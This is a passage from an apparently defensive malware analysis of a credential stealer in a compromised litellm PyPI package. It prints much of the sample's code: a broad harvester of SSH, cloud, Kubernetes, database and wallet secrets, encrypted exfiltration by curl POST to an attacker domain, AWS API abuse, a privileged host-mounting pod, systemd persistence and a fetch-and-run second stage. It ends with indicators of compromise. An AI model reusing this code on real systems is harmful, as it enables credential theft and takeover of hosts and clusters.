subprocess.run(["openssl", "enc", "-aes-256-cbc", "-in", collected, "-out", ef, "-pass", f"file:{sk}", "-pbkdf2"], check=True, stderr=subprocess.DEVNULL)
subprocess.run(["openssl", "pkeyutl", "-encrypt", "-pubin", "-inkey", pk, "-in", sk, "-out", ek, "-pkeyopt", "rsa_padding_mode:oaep"], check=True, stderr=subprocess.DEVNULL)
subprocess.run(["tar", "-czf", bn, "-C", d, "payload.enc", "session.key.enc"], check=True)
The sequence is:
- Generate a 32-byte random symmetric key with openssl rand.
- Encrypt the collected data with AES-256-CBC (-pbkdf2).
- Encrypt the symmetric key with RSA-OAEP against an embedded public key.
- Bundle both ciphertexts into a tar.gz.
This is textbook hybrid encryption, a pattern more often associated with ransomware, which is interesting coming from what otherwise appears to be a slapdash credential stealer. Bulk data under symmetric crypto for speed, key exchange under asymmetric crypto for confidentiality. Only the attacker holds the private RSA key, so even if a defender intercepts the tarball in transit or captures it from the temp directory, the contents are unrecoverable without that key.
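You can reproduce the envelope end-to-end with the same openssl invocations, plus the decrypt side only the private-key holder can run. A sketch via subprocess, assuming openssl is on PATH; the keypair and file names are mine, not the sample's:

```python
import os
import subprocess
import tempfile

def sh(*args):
    subprocess.run(args, check=True, stderr=subprocess.DEVNULL)

with tempfile.TemporaryDirectory() as d:
    p = lambda n: os.path.join(d, n)
    with open(p("loot"), "wb") as f:
        f.write(b"AWS_SECRET_ACCESS_KEY=example\n")

    # Attacker-side keypair (the sample embeds only the public half).
    sh("openssl", "genpkey", "-algorithm", "RSA",
       "-pkeyopt", "rsa_keygen_bits:2048", "-out", p("priv.pem"))
    sh("openssl", "pkey", "-in", p("priv.pem"), "-pubout", "-out", p("pub.pem"))

    # The sample's envelope: random session key, AES-256-CBC bulk, RSA-OAEP key wrap.
    sh("openssl", "rand", "-out", p("session.key"), "32")
    sh("openssl", "enc", "-aes-256-cbc", "-in", p("loot"), "-out", p("payload.enc"),
       "-pass", f"file:{p('session.key')}", "-pbkdf2")
    sh("openssl", "pkeyutl", "-encrypt", "-pubin", "-inkey", p("pub.pem"),
       "-in", p("session.key"), "-out", p("session.key.enc"),
       "-pkeyopt", "rsa_padding_mode:oaep")

    # Decrypt side: unwrap the session key with the private key, then the bulk data.
    sh("openssl", "pkeyutl", "-decrypt", "-inkey", p("priv.pem"),
       "-in", p("session.key.enc"), "-out", p("session.key.dec"),
       "-pkeyopt", "rsa_padding_mode:oaep")
    sh("openssl", "enc", "-d", "-aes-256-cbc", "-in", p("payload.enc"),
       "-out", p("loot.dec"), "-pass", f"file:{p('session.key.dec')}", "-pbkdf2")

    with open(p("loot.dec"), "rb") as f:
        recovered = f.read()
    print(recovered == b"AWS_SECRET_ACCESS_KEY=example\n")  # True
```

Without priv.pem the decrypt step is where a defender stalls, which is the entire point of the envelope.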
The sample then ships the bundle:
subprocess.run([
"curl", "-s", "-o", "/dev/null", "-w", "%{http_code}", "-X", "POST",
"hxxps://models[.]litellm[.]cloud/",
"-H", "Content-Type: application/octet-stream",
"-H", "X-Filename: tpcp.tar.gz",
"--data-binary", f"@{bn}"
], check=True, stderr=subprocess.DEVNULL)
The exfiltration endpoint is models[.]litellm[.]cloud, which appears to be a domain chosen to blend in with the legitimate LiteLLM project. The HTTP header X-Filename: tpcp.tar.gz is a useful correlation pivot as the tpcp string matches naming used in public reporting on this campaign family (again, leaving that to the threat intel peeps). The POST uses Content-Type: application/octet-stream, which is generic enough to pass casual inspection on most network monitoring setups.
Credential Vacuum
So what actually gets hoovered up?
The harvester is built around four utility functions that pipe everything through stdout as a single concatenated byte stream:
def emit(path):
try:
st=os.stat(path)
if not stat.S_ISREG(st.st_mode):return
with open(path,'rb') as fh:data=fh.read()
sys.stdout.buffer.write(('\n=== '+path+' ===\n').encode())
sys.stdout.buffer.write(data)
sys.stdout.buffer.write(b'\n')
except OSError:pass
def emit_glob(pattern):
for p in glob.glob(pattern,recursive=True):emit(p)
def run(cmd):
try:
out=subprocess.check_output(cmd,shell=True,stderr=subprocess.DEVNULL,timeout=10)
if out:
sys.stdout.buffer.write(('\n=== CMD: '+cmd+' ===\n').encode())
sys.stdout.buffer.write(out)
sys.stdout.buffer.write(b'\n')
except Exception:pass
def walk(roots,max_depth,match_fn):
for root in roots:
if not os.path.isdir(root):continue
for dirpath,dirs,files in os.walk(root,followlinks=False):
rel=os.path.relpath(dirpath,root)
depth=0 if rel=='.' else rel.count(os.sep)+1
if depth>=max_depth:dirs[:]=[];continue
for fn in files:
fp=os.path.join(dirpath,fn)
                if match_fn(fp,fn):emit(fp)
emit(path) reads a single file and writes it to stdout with a === path === delimiter. emit_glob(pattern) walks a recursive glob and calls emit for each match. run(cmd) executes a shell one-liner and writes output the same way. walk(roots, max_depth, match_fn) is a depth-capped directory traversal (os.walk, no symlink follows) that prunes deeper dirs when max_depth is reached and calls emit on files where match_fn(full_path, filename) returns true. Every piece of collected data flows through stdout. The parent orchestrator captures that stream and it becomes the blob that gets encrypted and exfiltrated.
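The depth cap is the subtle part of walk: it prunes dirs in place so os.walk never descends past max_depth, and files at the cutoff depth are skipped too. A quick check of that behavior with a throwaway tree, using the same traversal logic but collecting matches instead of emit():

```python
import os
import tempfile

def walk(roots, max_depth, match_fn, hits):
    # Same traversal logic as the harvester's walk(), with emit() replaced
    # by appending to `hits` so the behavior is observable.
    for root in roots:
        if not os.path.isdir(root):
            continue
        for dirpath, dirs, files in os.walk(root, followlinks=False):
            rel = os.path.relpath(dirpath, root)
            depth = 0 if rel == "." else rel.count(os.sep) + 1
            if depth >= max_depth:
                dirs[:] = []  # prune in place: os.walk won't descend further
                continue
            for fn in files:
                if match_fn(os.path.join(dirpath, fn), fn):
                    hits.append(os.path.join(dirpath, fn))

with tempfile.TemporaryDirectory() as root:
    os.makedirs(os.path.join(root, "a", "b", "c"))
    for sub in ["", "a", "a/b", "a/b/c"]:
        open(os.path.join(root, sub, ".env"), "w").close()
    found = []
    walk([root], 2, lambda fp, fn: fn == ".env", found)
    print(len(found))  # 2: root/.env and root/a/.env; deeper copies are pruned
```

That cap is a throughput choice: it bounds runtime on big filesystems while still sweeping the shallow locations where credentials usually live.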
The target surface is honestly impressive. Below are snippets from the harvester grouped by service, roughly in payload execution order.
Host and environment
Standard whoami stuff:
run('hostname; pwd; whoami; uname -a; ip addr 2>/dev/null || ifconfig 2>/dev/null; ip route 2>/dev/null')
run('printenv')
SSH
User keys, authorized_keys, known_hosts, config, a shallow recursive sweep of each home’s .ssh, and host keys under /etc/ssh.
for h in homes+['/root']:
for f in ['/.ssh/id_rsa','/.ssh/id_ed25519','/.ssh/id_ecdsa','/.ssh/id_dsa','/.ssh/authorized_keys','/.ssh/known_hosts','/.ssh/config']:
emit(h+f)
walk([h+'/.ssh'],2,lambda fp,fn:True)
walk(['/etc/ssh'],1,lambda fp,fn:fn.startswith('ssh_host') and fn.endswith('_key'))
Git
for h in homes+['/root']:
    for f in ['/.git-credentials','/.gitconfig']:emit(h+f)
Application environment files (.env)
Relative paths, /app, /etc/environment, and a depth-6 walk under all_roots for common .env names.
for d in ['.','..','../..']:
    for f in ['.env','.env.local','.env.production','.env.development','.env.staging','.env.test']:
        emit(d+'/'+f)
emit('/app/.env')
emit('/etc/environment')
walk(all_roots,6,lambda fp,fn:fn in {'.env','.env.local','.env.production','.env.development','.env.staging'})
AWS (files, env, and link-local metadata)
On-disk ~/.aws files, AWS_* env grep, ECS task role URI (169.254.170.2), and a naive EC2 IMDS role listing via 169.254.169.254. Live API calls with SigV4 (Secrets Manager, SSM) are a separate pass (see AWS SigV4 API Abuse).
for h in homes+['/root']:
    emit(h+'/.aws/credentials')
    emit(h+'/.aws/config')
run('env | grep AWS_')
run('curl -s http://169.254.170.2${AWS_CONTAINER_CREDENTIALS_RELATIVE_URI} 2>/dev/null || true')
run('curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/ 2>/dev/null || true')
Google Cloud
for h in homes+['/root']:
    walk([h+'/.config/gcloud'],4,lambda fp,fn:True)
emit('/root/.config/gcloud/application_default_credentials.json')
run('env | grep -i google; env | grep -i gcloud')
run('cat $GOOGLE_APPLICATION_CREDENTIALS 2>/dev/null || true')
Microsoft Azure
for h in homes+['/root']:
    walk([h+'/.azure'],3,lambda fp,fn:True)
run('env | grep -i azure')
Kubernetes
Kubeconfigs, in-cluster control-plane paths, mounted service-account material, ad-hoc secret file discovery, env scraping, and a broad kubectl pull if the binary exists.
for h in homes+['/root']:
    emit(h+'/.kube/config')
emit('/etc/kubernetes/admin.conf')
emit('/etc/kubernetes/kubelet.conf')
emit('/etc/kubernetes/controller-manager.conf')
emit('/etc/kubernetes/scheduler.conf')
emit('/var/run/secrets/kubernetes.io/serviceaccount/token')
emit('/var/run/secrets/kubernetes.io/serviceaccount/ca.crt')
emit('/var/run/secrets/kubernetes.io/serviceaccount/namespace')
emit('/run/secrets/kubernetes.io/serviceaccount/token')
emit('/run/secrets/kubernetes.io/serviceaccount/ca.crt')
run('find /var/secrets /run/secrets -type f 2>/dev/null | xargs -I{} sh -c \'echo "=== {} ==="; cat "{}" 2>/dev/null\'')
run('env | grep -i kube; env | grep -i k8s')
run('kubectl get secrets --all-namespaces -o json 2>/dev/null || true')
Docker and container registry
for h in homes+['/root']:
    emit(h+'/.docker/config.json')
emit('/kaniko/.docker/config.json')
emit('/root/.docker/config.json')
Developer secrets, vaults, and shell histories
for h in homes+['/root']:
    emit(h+'/.npmrc')
    emit(h+'/.vault-token')
    emit(h+'/.netrc')
    emit(h+'/.lftp/rc')
    emit(h+'/.msmtprc')
    emit(h+'/.my.cnf')
    emit(h+'/.pgpass')
    emit(h+'/.mongorc.js')
    for hist in ['/.bash_history','/.zsh_history','/.sh_history','/.mysql_history','/.psql_history','/.rediscli_history']:
        emit(h+hist)
Databases, LDAP, and mail server config
emit('/var/lib/postgresql/.pgpass')
emit('/etc/mysql/my.cnf')
emit('/etc/redis/redis.conf')
emit('/etc/postfix/sasl_passwd')
emit('/etc/msmtprc')
emit('/etc/ldap/ldap.conf')
emit('/etc/openldap/ldap.conf')
emit('/etc/ldap.conf')
emit('/etc/ldap/slapd.conf')
emit('/etc/openldap/slapd.conf')
run('env | grep -iE "(DATABASE|DB_|MYSQL|POSTGRES|MONGO|REDIS|VAULT)"')
WireGuard
walk(['/etc/wireguard'],1,lambda fp,fn:fn.endswith('.conf'))
run('wg showconf all 2>/dev/null || true')
Helm, Terraform, and CI
for h in homes+['/root']:
    walk([h+'/.helm'],3,lambda fp,fn:True)
for ci in ['terraform.tfvars','.gitlab-ci.yml','.travis.yml','Jenkinsfile','.drone.yml','Anchor.toml','ansible.cfg']:
    emit(ci)
walk(all_roots,4,lambda fp,fn:fn.endswith('.tfvars'))
walk(all_roots,4,lambda fp,fn:fn=='terraform.tfstate')
TLS keys and certificates on disk
walk(['/etc/ssl/private'],1,lambda fp,fn:fn.endswith('.key'))
walk(['/etc/letsencrypt'],4,lambda fp,fn:fn.endswith('.pem'))
walk(all_roots,5,lambda fp,fn:os.path.splitext(fn)[1] in {'.pem','.key','.p12','.pfx'})
Slack, Discord, and loose API-key greps
run('grep -r "hooks.slack.com\|discord.com/api/webhooks" . 2>/dev/null | head -20')
run('grep -rE "api[_-]?key|apikey|api[_-]?secret|access[_-]?token" . --include="*.env*" --include="*.json" --include="*.yml" --include="*.yaml" 2>/dev/null | head -50')
Cryptocurrency wallets
Coin daemon configs, wallet files, L1/L2 keystores, Solana keypairs, validator paths, and Anchor-style JSON hunts.
for h in homes+['/root']:
    for coin in ['/.bitcoin/bitcoin.conf','/.litecoin/litecoin.conf','/.dogecoin/dogecoin.conf','/.zcash/zcash.conf','/.dashcore/dash.conf','/.ripple/rippled.cfg','/.bitmonero/bitmonero.conf']:
        emit(h+coin)
    walk([h+'/.bitcoin'],2,lambda fp,fn:fn.startswith('wallet') and fn.endswith('.dat'))
    walk([h+'/.ethereum/keystore'],1,lambda fp,fn:True)
    walk([h+'/.cardano'],3,lambda fp,fn:fn.endswith('.skey') or fn.endswith('.vkey'))
    walk([h+'/.config/solana'],3,lambda fp,fn:True)
    for sol in ['/validator-keypair.json','/vote-account-keypair.json','/authorized-withdrawer-keypair.json','/stake-account-keypair.json','/identity.json','/faucet-keypair.json']:
        emit(h+sol)
    walk([h+'/ledger'],3,lambda fp,fn:fn.endswith('.json') or fn.endswith('.bin'))
for sol_dir in ['/home/sol','/home/solana','/opt/solana','/solana','/app','/data']:
    emit(sol_dir+'/validator-keypair.json')
walk(['.'],8,lambda fp,fn:fn in {'id.json','keypair.json'} or (fn.endswith('-keypair.json') and 'keypair' in fn) or (fn.startswith('wallet') and fn.endswith('.json')))
walk(['.anchor','./target/deploy','./keys'],5,lambda fp,fn:fn.endswith('.json'))
run('env | grep -i solana')
run('grep -r "rpcuser\|rpcpassword\|rpcauth" /root /home 2>/dev/null | head -50')
Host identity and SSH login trail
emit('/etc/passwd')
emit('/etc/shadow')
run('cat /var/log/auth.log 2>/dev/null | grep Accepted | tail -200')
run('cat /var/log/secure 2>/dev/null | grep Accepted | tail -200')
The breadth of this thing tells you a lot about the intended victim profile. The author anticipates servers, CI runners, Kubernetes pods, cloud workstations, and cryptocurrency infrastructure. The /etc/shadow grab and successful-SSH-login tails are reconnaissance and lateral-movement fuel.
The harvester runs every collector unconditionally and relies on empty except blocks for silent failure. If a path doesn’t exist, it moves on. If a command times out, it moves on.
AWS SigV4 API Abuse
After the file-grinding phase, the harvester goes further than most credential stealers I’ve seen in supply-chain attacks. It embeds a full AWS Signature Version 4 signing routine using only the standard library:
import urllib.request,urllib.error,json,hmac,hashlib,datetime,base64
def aws_req(method,service,region,path,payload,extra_headers,access_key,secret_key,token):
    host=f'{service}.{region}.amazonaws.com'
    t=datetime.datetime.utcnow()
    amzdate=t.strftime('%Y%m%dT%H%M%SZ')
    datestamp=t.strftime('%Y%m%d')
    canonical_uri=path
    canonical_querystring=''
    canonical_headers=f'host:{host}\nx-amz-date:{amzdate}\n'
    signed_headers='host;x-amz-date'
    if token:
        canonical_headers+=f'x-amz-security-token:{token}\n'
        signed_headers+=';x-amz-security-token'
    payload_hash=hashlib.sha256(payload.encode()).hexdigest()
    canonical_request=f'{method}\n{canonical_uri}\n{canonical_querystring}\n{canonical_headers}\n{signed_headers}\n{payload_hash}'
    credential_scope=f'{datestamp}/{region}/{service}/aws4_request'
    string_to_sign=f'AWS4-HMAC-SHA256\n{amzdate}\n{credential_scope}\n'+hashlib.sha256(canonical_request.encode()).hexdigest()
    def sign(key,msg):return hmac.new(key,msg.encode(),'sha256').digest()
    signing_key=sign(sign(sign(sign(f'AWS4{secret_key}'.encode(),datestamp),region),service),'aws4_request')
    signature=hmac.new(signing_key,string_to_sign.encode(),'sha256').hexdigest()
    auth=f'AWS4-HMAC-SHA256 Credential={access_key}/{credential_scope}, SignedHeaders={signed_headers}, Signature={signature}'
    hdrs={'x-amz-date':amzdate,'Authorization':auth,'x-amz-content-sha256':payload_hash}
    if token:hdrs['x-amz-security-token']=token
    hdrs.update(extra_headers)
    req=urllib.request.Request(f'https://{host}{path}',data=payload.encode() if payload else None,headers=hdrs,method=method)
    try:
        with urllib.request.urlopen(req,timeout=10) as r:return json.loads(r.read())
    except:return {}
If AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY are present in the environment, the harvester:
- Emits the raw credentials to stdout.
- Attempts IMDSv2 (PUT token request + role credential fetch) to refresh or replace keys with instance-profile credentials.
- Calls Secrets Manager (ListSecrets) to enumerate secret metadata.
- Calls SSM (DescribeParameters) to enumerate parameter store entries.
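For reference, the IMDSv2 exchange described in the second bullet is a two-step HTTP dance: a PUT for a session token, then a GET for role credentials presenting that token. A sketch of the request construction (the endpoint and header names are AWS's documented ones; the helper function is my illustration, not the sample's code):

```python
import urllib.request

IMDS = 'http://169.254.169.254'

def build_imdsv2_requests(role_name=''):
    # Step 1: request a short-lived session token (IMDSv2 requires a PUT).
    token_req = urllib.request.Request(
        IMDS + '/latest/api/token',
        headers={'X-aws-ec2-metadata-token-ttl-seconds': '21600'},
        method='PUT')
    # Step 2: fetch role credentials, presenting the token from step 1.
    # With an empty role_name this lists the available role names instead.
    cred_req = urllib.request.Request(
        IMDS + '/latest/meta-data/iam/security-credentials/' + role_name,
        headers={'X-aws-ec2-metadata-token': '<token from step 1>'})
    return token_req, cred_req
```

On a real EC2 instance the two requests are sent in order with urlopen; off-instance, the link-local address simply times out, which is why the harvester wraps every metadata call in silent error handling.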
There’s a bug here worth noting. The follow-on GetSecretValue loop passes an empty string as the HTTP body:
for s in sm.get('SecretList',sm.get('SecretList',[])):
    sid=s.get('ARN','')
    sv=aws_req('POST','secretsmanager',REG,'/','',
        {'Content-Type':'application/x-amz-json-1.1','X-Amz-Target':'secretsmanager.GetSecretValue',
         'Content-Type':'application/x-amz-json-1.1'},AK,SK,ST)
A working GetSecretValue call needs a JSON payload like {"SecretId": "<ARN>"}. An empty body should yield a SerializationException. There's also a duplicated Content-Type key in the header dict (harmless, since both values match). Mistakes like these read more like human sloppiness than machine-generated code, but there's nothing definitive proving it one way or the other.
The practical implication is that even with valid keys, the sample can enumerate secret metadata via ListSecrets but probably can't retrieve actual secret values without fixing that request shape. Whether that's sloppiness, a vibe-coded quirk, or simply unfinished work, the intent is clear either way.
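For contrast, here is the request shape a working call would need (protocol details per the public Secrets Manager API; the helper itself is illustrative, not from the sample):

```python
import json

def get_secret_value_request(secret_arn):
    # GetSecretValue is an x-amz-json-1.1 POST whose body must name the
    # secret; this is the payload the sample leaves as an empty string.
    payload = json.dumps({'SecretId': secret_arn})
    headers = {
        'Content-Type': 'application/x-amz-json-1.1',
        'X-Amz-Target': 'secretsmanager.GetSecretValue',
    }
    return payload, headers
```

Feeding that payload through the sample's aws_req in place of the empty string is the one-line fix the author never made.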
Kubernetes Cluster Pivot
If a pod service-account token is present at the expected mount path, the sample pivots to the Kubernetes API. It builds an in-cluster client with a notable TLS fallback:
def k8s_get(path):
    import ssl
    ctx=ssl.create_default_context(cafile=K8S_CA) if os.path.exists(K8S_CA) else ssl._create_unverified_context()
    req=urllib.request.Request(api+path,headers=hdrs)
    try:
        with urllib.request.urlopen(req,context=ctx,timeout=10) as r:return json.loads(r.read())
    except:return {}
def k8s_post(path,data):
    import ssl
    ctx=ssl.create_default_context(cafile=K8S_CA) if os.path.exists(K8S_CA) else ssl._create_unverified_context()
    req=urllib.request.Request(api+path,data=json.dumps(data).encode(),headers=hdrs,method='POST')
    try:
        with urllib.request.urlopen(req,context=ctx,timeout=30) as r:return json.loads(r.read())
    except:return {}
When the CA path is missing, k8s_get/k8s_post fall back to ssl._create_unverified_context(). The first move is a horizontal sweep: the sample fetches /api/v1/secrets (cluster-wide), then lists all namespaces and pulls /api/v1/namespaces/{ns}/secrets for each one. In misconfigured clusters, a single service-account token can read secrets across every namespace, so these can be extremely high value.
Then, for each node in the cluster, the sample builds a privileged Pod manifest:
pod_manifest={
    'apiVersion':'v1','kind':'Pod',
    'metadata':{'name':f'node-setup-{node_name[:35]}','namespace':'kube-system'},
    'spec':{
        'nodeName':node_name,
        'hostPID':True,'hostNetwork':True,
        'tolerations':[{'operator':'Exists'}],
        'containers':[{
            'name':'setup',
            'image':'alpine:latest',
            'command':['sh','-c',drop_cmd],
            'securityContext':{'privileged':True},
            'volumeMounts':[{'name':'host','mountPath':'/host'}]
        }],
        'volumes':[{'name':'host','hostPath':{'path':'/'}}],
        'restartPolicy':'Never'
    }
}
k8s_post('/api/v1/namespaces/kube-system/pods',pod_manifest)
Everything about this spec is designed for maximum host access: hostPID, hostNetwork, a hostPath volume mounting / from the node to /host in the container, tolerations: [{"operator": "Exists"}] to schedule on any node including tainted ones, and securityContext: {"privileged": true}. The container’s shell command writes the decoded C2 stub (more on this in a moment) to /host/root/.config/sysmon/sysmon.py, discovers the Python binary via chroot /host which python3, and installs a systemd user unit called “System Telemetry Service.” That’s persistence on the host OS rather than inside a container.
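The verbatim drop_cmd string isn't reproduced here, but given the behavior described above it has to perform roughly these steps. A hypothetical reconstruction (the paths come from the sample; the shell syntax is my guess at the shape, not the actual payload):

```python
def build_drop_cmd(persist_b64):
    # Hypothetical reconstruction: everything runs against the hostPath
    # mount at /host, so writes land on the node's real filesystem.
    return ' && '.join([
        'mkdir -p /host/root/.config/sysmon',
        # Decode the embedded stub onto the host.
        f'echo {persist_b64} | base64 -d > /host/root/.config/sysmon/sysmon.py',
        'chmod 700 /host/root/.config/sysmon/sysmon.py',
        # Locate a Python interpreter as the host sees it, via chroot.
        'PY=$(chroot /host which python3)',
    ])
```

The chroot trick matters because the alpine container image has no Python of its own; the command has to resolve the interpreter path as it exists on the node.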
One static-analysis finding worth flagging: PERSIST_B64 is only assigned inside the if os.path.exists(SA_TOKEN_PATH) branch (the K8s path). The local persistence block that follows uses base64.b64decode(PERSIST_B64) outside that branch:
PERSIST_B64='aW1wb3J0IHVybGxpYi5yZXF1...[snip]...'
nodes=k8s_get('/api/v1/nodes')
The assignment sits alongside the K8s node loop. Then, after that whole if os.path.exists(SA_TOKEN_PATH): block closes, the unconditional local-install path runs:
home=os.path.expanduser('~')
script_dir=os.path.join(home,'.config','sysmon')
script_path=os.path.join(script_dir,'sysmon.py')
unit_dir=os.path.join(home,'.config','systemd','user')
unit_path=os.path.join(unit_dir,'sysmon.service')
if not os.path.exists(script_path):
    os.makedirs(script_dir,exist_ok=True)
    os.makedirs(unit_dir,exist_ok=True)
    try:
        with open(script_path,'wb') as f:f.write(base64.b64decode(PERSIST_B64))
        os.chmod(script_path,0o700)
        import shutil
        py=shutil.which('python3') or shutil.which('python')
        if py:
            unit=f'[Unit]\nDescription=System Telemetry Service\nAfter=network.target\nStartLimitIntervalSec=0\n\n[Service]\nType=simple\nExecStart={py} {script_path}\nRestart=always\nRestartSec=10\nKillMode=process\nStandardOutput=null\nStandardError=null\n\n[Install]\nWantedBy=multi-user.target\n'
            with open(unit_path,'w') as f:f.write(unit)
            subprocess.run(['systemctl','--user','daemon-reload'],capture_output=True,timeout=5)
            subprocess.run(['systemctl','--user','enable','--now','sysmon.service'],capture_output=True,timeout=5)
    except:pass
On a machine with no in-cluster token file, PERSIST_B64 is never defined, so that line raises NameError, swallowed by the bare except. The local “install sysmon for the interactive user” path silently fails on vanilla workstations and CI runners that aren’t running in a Kubernetes pod. The privileged-pod path still targets root on nodes.
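The failure mode is easy to demonstrate in isolation. A toy version of the control flow (the names and the blob are placeholders, not the sample's):

```python
import base64

def install_persistence(has_k8s_token):
    # PERSIST_B64 is only bound on the K8s branch, as in the sample.
    if has_k8s_token:
        PERSIST_B64 = 'aW1wb3J0IG9z'  # placeholder blob ("import os")
    try:
        # Without the token branch this raises UnboundLocalError
        # (a NameError subclass), silently eaten by the bare except.
        return base64.b64decode(PERSIST_B64)
    except:
        return None
```

Calling install_persistence(False) returns None instead of installing anything, which is exactly why the user-level persistence never lands on hosts outside a pod.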
Systemd Dead Drop C2
Finally, the command & control module. It’s super straightforward.
The innermost decoded blob is a stub loader for whatever the operator chooses for the second stage.
def g():
    try:
        req = urllib.request.Request(C_URL, headers={'User-Agent': 'Mozilla/5.0'})
        with urllib.request.urlopen(req, timeout=10) as r:
            link = r.read().decode('utf-8').strip()
            return link if link.startswith("http") else None
    except:
        return None
if __name__ == "__main__":
    time.sleep(300)
    while True:
        l = g()
        prev = ""
        if os.path.exists(STATE):
            try:
                with open(STATE, "r") as f:
                    prev = f.read().strip()
            except:
                pass
        if l and l != prev and "youtube.com" not in l:
            e(l)
        time.sleep(3000)
The stub sleeps for 300 seconds before entering its main loop. That front-loaded sleep is consistent with simple sandbox timing evasion.
After the sleep, the loop runs on a 3000-second (50-minute) interval. Each iteration fetches the response body from checkmarx[.]zone/raw (yes, another unrelated vendor name being squatted for infrastructure camouflage) and interprets it as a URL if it starts with http. It compares against a state file at /tmp/.pg_state to avoid re-downloading the same payload. If the URL is new and doesn’t contain youtube.com, it downloads the target and launches it:
def e(l):
    try:
        urllib.request.urlretrieve(l, TARGET)
        os.chmod(TARGET, 0o755)
        subprocess.Popen([TARGET], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, start_new_session=True)
        with open(STATE, "w") as f:
            f.write(l)
    except:
        pass
The youtube.com check is odd, but it is probably a guard against junk or decoy URLs appearing in the dead-drop body before the second stage is fetched.
In any case, the stub downloads to /tmp/pglog, marks it executable, and launches it detached in a new session via Popen. The state file prevents re-execution of the same binary on every poll.
This is two-stage command and control. The compromised PyPI package handles credential theft and initial persistence. The remote paste URL can rotate the actual second-stage binary without republishing the wheel. The operator can deploy entirely different malware families over time, using the PyPI compromise as a beachhead.
The systemd unit that hosts this stub is named “System Telemetry Service” with the path ~/.config/sysmon/sysmon.py, which is likely an attempt to blend in with benign system-monitoring files.
Conclusion
In many ways, this is a classic dime-a-dozen credential stealer. In other ways, there’s some surprising stuff in here. Hybrid encryption in a credential stealer is interesting as most cred stealers do not go through the trouble of implementing a crypto system you’d commonly see in ransomware (why encrypt at all when you only intend to steal the creds rather than ransom them?). The same goes for the extended exploitation modules, which target specific K8s and AWS persistence mechanisms. Extensive technical targeting of cloud services like this is uncommon for the average cred stealer but speaks to the malware developer’s intended victim profile.
IoCs are below. ✌️
References
- Alex Birsan quote
- Python site module documentation
- PEP 302 - New Import Hooks
- PyPI Inspector
- LiteLLM GitHub Repo Issue
Indicators of compromise
| Type | Indicator | Notes |
|---|---|---|
| SHA256 | 71e35aef03099cd1f2d6446734273025a163597de93912df321ef118bf135238 | SHA256 of litellm_init[.]pth sample. |
| PyPI package | litellm | Supply-chain compromise via published wheels for version 1.82.8 |
| Wheel / site-packages file | litellm_init.pth | Path hook under site-packages |
| Network (exfil) | POST to hxxps://models[.]litellm[.]cloud/ | Encrypted archive uploaded as application/octet-stream, sample uses header X-Filename: tpcp.tar.gz. |
| Archive / header | tpcp.tar.gz | Filename on the HTTP upload (tarball containing payload.enc and session.key.enc in the analyzed flow) |
| Network (stage-2 bootstrap) | hxxps://checkmarx[.]zone/raw | Loader polls this URL, body treated as a second-stage download link. User-Agent in sample: Mozilla/5.0. |
| Filesystem | ~/.config/sysmon/sysmon.py | Dropped persistence script (mode 0700 in sample), also written under host /root via privileged K8s pod path. |
| Filesystem | ~/.config/systemd/user/sysmon.service | systemd user unit. Unit description string in sample: System Telemetry Service. |
| Filesystem | /tmp/pglog | Second-stage binary dropped and executed (chmod 0755). |
| Filesystem | /tmp/.pg_state | Stores last seen second-stage URL to avoid re-downloading the same link. |
| Kubernetes | Pod name prefix node-setup-, namespace kube-system | Privileged pod spec with hostPath / → /host, hostPID, hostNetwork, image alpine:latest in analyzed sample. |
| Process / behavior | python -c with base64 + exec, detached Popen | Initial .pth execution pattern. stdio redirected to DEVNULL. |
| Process / behavior | openssl enc -aes-256-cbc, openssl pkeyutl -encrypt, openssl rand | Local encryption of collected material before exfil. |
| Process / behavior | curl POST of tarball | Outbound upload of encrypted package. |
